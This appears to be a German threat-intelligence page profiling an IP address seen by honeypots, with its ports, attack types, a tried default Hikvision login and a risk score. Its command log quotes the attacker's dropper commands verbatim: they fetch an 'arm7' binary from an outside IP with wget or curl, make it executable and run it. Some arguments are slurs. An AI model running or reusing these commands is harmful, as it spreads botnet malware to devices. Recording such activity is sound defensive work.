TROYANOSYVIRUS
Aktive BedrohungHOCH

176.65.139.8

Herkunftsland🇸🇬 Singapur
Erste Erkennung29.1.2026
Letzte Aktivitat23.2.2026
ISPOVH SAS
🎯
694
Gesamtangriffe
🔌
24
Ports
📡
5
Angriffsarten
🦠
0
Malware

Geolokalisierung

Land
🇸🇬 Singapur
Stadt
Unbekannt
ASN
AS16276
ISP
OVH SAS

Angriffsarten

cowrie
adbhoney
dionaea
tanner
honeytrap

Angegriffene Ports

22238081200223234000555555566036800080818088816190001002317000170012088023231+4

Zugehorige Malware

Keine zugehorige Malware

Versuchte Anmeldedaten

🔐hikvision/hikvision
10x

Ausgefuhrte Befehle

$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod 777 arm7; ./arm719x
$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod 777 arm7; ./arm7 faggot; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod 777 arm7; ./arm7 faggot10x
$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod 777 arm7; ./arm7 hacked; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod 777 arm7; ./arm7 hacked9x
$sh -c 'cd /data/local/tmp; wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 meow; curl -s http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm7 meow; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 meow'5x
$sh -c 'wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7'4x
$sh -c 'cd /data/local/tmp; wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 jew; curl -s http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm7 jew; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 jew'4x
$cat > /data/local/tmp/dlr; chmod +x /data/local/tmp/dlr; /data/local/tmp/dlr3x
$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod 777 arm7; ./arm7 adb; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod 777 arm7; ./arm7 adb2x
$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:34029/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:34029/arm7 -o arm7; chmod 777 arm7; ./arm71x

Risikobewertung

75
/100
NiedrigMittelHochKritisch